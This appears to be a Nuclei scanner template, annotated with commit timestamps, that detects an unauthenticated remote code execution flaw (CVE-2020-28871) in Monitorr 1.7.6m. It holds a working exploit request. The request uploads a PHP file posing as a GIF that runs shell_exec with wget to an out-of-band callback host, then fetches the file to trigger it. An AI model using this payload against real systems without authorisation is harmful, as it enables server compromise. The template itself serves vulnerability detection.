2021-07-20 06:03:16 +00:00
id : CVE-2020-28871
2021-07-19 23:20:18 +00:00
info :
name : Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author : gy741
severity : critical
2021-09-05 21:13:45 +00:00
description : This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
2021-08-18 11:37:49 +00:00
reference :
2021-07-20 06:03:16 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
2021-07-19 23:20:18 +00:00
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
- https://www.exploit-db.com/exploits/48980
2021-10-18 20:40:26 +00:00
tags : cve,cve2020,monitorr,rce,oast
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2020-28871
cwe-id : CWE-434
2021-07-19 23:20:18 +00:00
requests :
- raw :
- |
POST /assets/php/upload.php HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Accept : text/plain, */*; q=0.01
Connection : close
Accept-Language : en-US,en;q=0.5
X-Requested-With : XMLHttpRequest
Content-Type : multipart/form-data; boundary=---------------------------31046105003900160576454225745
Origin : http://{{Hostname}}
Referer : http://{{Hostname}}
-----------------------------31046105003900160576454225745
2021-07-20 06:03:16 +00:00
Content-Disposition : form-data; name="fileToUpload"; filename="{{randstr}}.php"
2021-07-19 23:20:18 +00:00
Content-Type : image/gif
GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
-----------------------------31046105003900160576454225745 --
- |
2021-07-20 06:03:16 +00:00
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
2021-07-19 23:20:18 +00:00
Host : {{Hostname}}
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"